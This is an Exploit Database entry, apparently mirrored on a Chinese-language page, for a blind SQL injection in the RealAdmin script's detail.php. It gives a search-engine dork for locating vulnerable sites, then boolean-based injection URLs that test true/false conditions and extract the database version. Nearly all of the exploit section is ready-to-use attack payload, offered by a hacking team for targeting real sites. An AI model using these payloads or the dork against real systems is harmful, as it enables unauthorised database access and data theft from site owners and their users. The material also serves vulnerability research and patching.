RealAdmin – ‘detail.php’ Blind SQL Injection

• Exploit Database
• 9 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2010-02-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11325/

• RealAdmin (detail.php) Blind Sql Injection Vulnerability
  ========================================================
  
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
  .:. Team : Sec Attack Team
  .:. Home : www.sec-attack.com/vb
  .:. Script : RealAdmin
  .:. Download Script: http://www.redcow.ca/products/realadmin/
  .:. Bug Type : Blind Sql Injection
  .:. Dork : "Powered by RealAdmin and Red Cow Technologies, Inc."
  
  ####################################################################
  
  ===[ Exploit ]===
  
  www.site.com/detail.php?id=[Blind SQL INJECTION]
  
  
  www.site.com/detail.php?id=NULL+and+1=1 >>> True
  www.site.com/detail.php?id=NULL+and+1=2 >>> False
  
  
  www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5>>> True
  www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4>>> False
  
  
  ####################################################################
  
  Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack